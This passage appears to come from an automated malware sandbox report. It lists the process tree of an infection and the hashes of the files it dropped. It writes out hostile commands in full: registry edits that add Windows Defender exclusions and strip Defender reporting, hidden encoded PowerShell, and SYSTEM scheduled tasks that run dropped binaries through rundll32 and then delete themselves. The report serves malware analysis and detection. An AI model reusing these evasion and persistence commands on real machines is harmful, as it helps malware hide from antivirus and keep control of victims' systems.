                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:5260
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:5516
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:5900
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:1652
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\AZgKexhzWxKGMSOL /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5648
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\AZgKexhzWxKGMSOL /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:5212
                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                          schtasks /CREATE /TN "gjNypQGjF" /SC once /ST 00:02:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                          PID:5944
                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                          schtasks /run /I /tn "gjNypQGjF"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:5744
                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                            schtasks /DELETE /F /TN "gjNypQGjF"
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:5752
                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:5296
                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                schtasks /CREATE /TN "vFsADyudLcNCFLIiL" /SC once /ST 00:18:04 /RU "SYSTEM" /TR "\"C:\Windows\Temp\AZgKexhzWxKGMSOL\jXDyBTktHXvIFQm\aYbceHP.exe\" Ne /PFsite_idZju 385118 /S" /V1 /F
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                PID:2648
                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                schtasks /run /I /tn "vFsADyudLcNCFLIiL"
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:6076
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                PID:3924
                                                                                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:2232
                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:4788
                                                                                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:5856
                                                                                                                                                                                    • C:\Windows\Temp\AZgKexhzWxKGMSOL\jXDyBTktHXvIFQm\aYbceHP.exe
                                                                                                                                                                                      C:\Windows\Temp\AZgKexhzWxKGMSOL\jXDyBTktHXvIFQm\aYbceHP.exe Ne /PFsite_idZju 385118 /S
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Drops Chrome extension
                                                                                                                                                                                      • Drops desktop.ini file(s)
                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                      PID:2132
                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                        schtasks /DELETE /F /TN "bNoYxGgNiGReyhFIfY"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:2856
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:3196
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:5220
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:1412
                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:5952
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:5588
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\DyYwGMOhU\AjCWqN.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "DQYxzwqpnFjMWpp" /V1 /F
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                    PID:3268
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    schtasks /CREATE /TN "DQYxzwqpnFjMWpp2" /F /xml "C:\Program Files (x86)\DyYwGMOhU\jhwFIHK.xml" /RU "SYSTEM"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                    PID:5800
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    schtasks /END /TN "DQYxzwqpnFjMWpp"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:5288
                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:2928
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /DELETE /F /TN "DQYxzwqpnFjMWpp"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:5140
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "ErFLQwbOwAPnds" /F /xml "C:\Program Files (x86)\NEwrPvSGentU2\gwfmGfi.xml" /RU "SYSTEM"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:5236
                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:4820
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "JNDkwYKtRGCRi2" /F /xml "C:\ProgramData\nFdGJOiAxzTYZTVB\zQbfzXm.xml" /RU "SYSTEM"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                            PID:5524
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "aFiSxxkLgMkoDeABA2" /F /xml "C:\Program Files (x86)\wqRDBEtPSAXhoJHUBaR\FSXZsOd.xml" /RU "SYSTEM"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                            PID:5740
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "XuRScOFPNbKOgbhScQj2" /F /xml "C:\Program Files (x86)\iRMzUYCAhkbMC\eIZaJzP.xml" /RU "SYSTEM"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                            PID:1448
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "LPyXfDhiQUyhASpny" /SC once /ST 00:26:13 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\AZgKexhzWxKGMSOL\okvOHbyE\SXdPESs.dll\",#1 /Zjsite_idgji 385118" /V1 /F
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                            PID:4828
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /run /I /tn "LPyXfDhiQUyhASpny"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:1804
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:676
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:1280
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:3476
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:904
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /DELETE /F /TN "vFsADyudLcNCFLIiL"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:3160
                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\AZgKexhzWxKGMSOL\okvOHbyE\SXdPESs.dll",#1 /Zjsite_idgji 385118
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:5332
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\AZgKexhzWxKGMSOL\okvOHbyE\SXdPESs.dll",#1 /Zjsite_idgji 385118
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                          PID:5356
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            schtasks /DELETE /F /TN "LPyXfDhiQUyhASpny"
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:1932

                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2.0MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          b667f8ea632e8b8a46516e26e7b64618

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          df558ecfac4dfb7b638bce324a67b75cadb6032c

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          13e110450cc9b80b3e61a034bd06a56e22b673574a86b85cffc376c56935f698

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          1579b53c1f438755004bf650780e21ac7c04fcdcf6413f87f0bb19e346eb2d84ddea6569ea53c89f2bc3eec2a384828c1ae04067e382b455ee090ab69ad21206

                                                                                                                                                                                                                        • C:\ProgramData\Are.docx

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          11KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          a33e5b189842c5867f46566bdbf7a095

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          e1c06359f6a76da90d19e8fd95e79c832edb3196

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                                                                                                                                                                                                        • C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          3KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          a133cc0ac7216d3baeca9eb10c5a3441

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          938e5a5483e43d44a71acf3cdbeb868e6fe82f00

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          948bd1baa2fdab5edfd31ed5394c5b4a18356a449b1366878537a6339b24721a

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          f019dcf305a6db74de16db1101c41e021a599ed19ccfd43f6cf7c0d3d09b36db42d2762bb44e64875c5f507960b758eb04373926ebb7b122dc532cc49b426cc5

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          187B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          136B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          150B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          10KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          4be0775c3711af34d3f9d23b9fe3f75a

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          9d2f9715a5e5655241b074300ac001c5a6d8eebc

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          c7036b67bc06de5a5932a9413aae636d6872ce5e2054fdf27f8291b12380c43e

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          9aabbf5736859aa04697e00577cfa3fd1a866d47f0bcb8753fdfe02f8ec96b2b5f7223e06ba1355c52b17d73f0868c9a32a7d193f7b4c0dffbc0bba2be49188e

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          3KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          ae626d9a72417b14570daa8fcd5d34a4

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          c103ebaf4d760df722d620df87e6f07c0486439f

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          52cc3f3028fab0d347a4a3fffef570b42f85748176d81a3344996d42fd1de32a

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          a0690bda318bdf43d6f292f88d4ea2ebeec83b95e9ebca80083dbb08e7ddcdb9735cc58b89d369a34f10acf8a114d4a207ed8d0f070c5baf87c5798e9f35bc14

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          ac4917a885cf6050b1a483e4bc4d2ea5

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          151B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          bd6b60b18aee6aaeb83b35c68fb48d88

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          19KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          491ee9dd85074aceb8d1df6e19ab872c

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          70ca752c807473332e9f11161bd7542f29a7795d

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          dbb9173cab79a1053cce8fbd1b5ddc04b44e994cab2d4ab89ee67613fef73c49

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          6ea751307227bf3a7571e0017afdf9934d761d54da4d26a6166e60875cc914648f8dc3b7218a4536d672926e20af0f80a4eea2da61f5fa44e799bc535279c247

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          19KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          63cbb3d0699af5deca084e974465d08f

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          13af16e4df4f6caaea565a54031afd548bd2fef9

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          015284b185b8656a4a9d1d6234a7a4a29204dbd87b79f41386d34320caa37f9c

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          fe6b98a8d99862decf736501285db0b4d9fb69352fbdc39adf0eefa5fea7011601a816c4ae0f67419ece1f8bf8a1a382efd1baa1b9b8658d052cb8b7272b8376

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          d3786ef00cda6576286cc80ac6d12626

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          0de8fb7e6c1940396a763731e46d8cab2fa0522b

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          88806739d61b2de835742487f6e7c0c4fda577115574978ab96a4342b7b818d2

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          6c28af9ba4ef0874fac3eb5c80e48344272f3f5c70c9baab01a3055a272ff26900b76da94b41734693707318ee82f092063d929bf088b473835e30bf38bcd6cd

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\b2gMRkczgaag78wae7PZ2Nm5.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          468KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          eb8a7b02c46712ec66267e8cfede7a20

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          27cb868f3b341096b9caa417f87fa3ab9b6cca5c

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          310695f052dd2b8e81811704295b1f46b3c706b542fde3960ff19fdec8d1e3f1

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          64b9ec8e8b842e1b7678946427de0f1a86a067c025ec82618bd37ff23d0da0809833142a37a58ea86b79d6e798af3fab00da8b8fd30ba45b50a5eca3aa7db1a1

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403230028181\additional_file0.tmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2.5MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          20d293b9bf23403179ca48086ba88867

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          dedf311108f607a387d486d812514a2defbd1b9e

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          5d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403230028181\opera_package

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          6.4MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          df47fc552c9da2059f11af3e2f826d34

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          539728e8d8e0666114ad8765dfbf2067bb63e208

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          2e555b14a84b81a142b58bf8fc2ef7901cfc46f34c0142b378bed0c653326ae8

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          5dfc9e1f5b724e775bdd2acfe1aa6329e00e03dae5813819add4b22f9c6d94cc74978dc1a2be6c9fe7614c6079d40c59437df525e51413da1eaf0993bd3de929

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1.8MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          8b8a78bcc4ba4e3730807036607c336c

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          2111f8a943159e9167c597071f40a3dd5ab5f9bd

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          2d29f6172ced07b81289c162cdd091d19627b979b07b110d2ea609e1cf78ab6c

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          ca0d40282576ea55292c8e3b514207ee233691cbc3679619c30c8e91af39ccf4c86c76d968e99c75d381dd90d20cf89d4a480ab431c5442a3c265088d338c740

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1001018001\file300un-1.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          424KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          7660d1df7575e664c8f11be23a924bba

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          22a6592b490e2ef908f7ecacb7cad34256bdd216

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          612300066252c3151883d30f69a9b287c323a4a484a35ca553c5a73d3f7d0cfc

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          77c22370eaed5e096a476778d24c26fcd0105d56419bbd1a5af125028dea702aa8537017629920de08f9b7c20d3b9242606e37ace3e456d34730d0e54f20c15e

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCA16.tmp\Install.exe

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

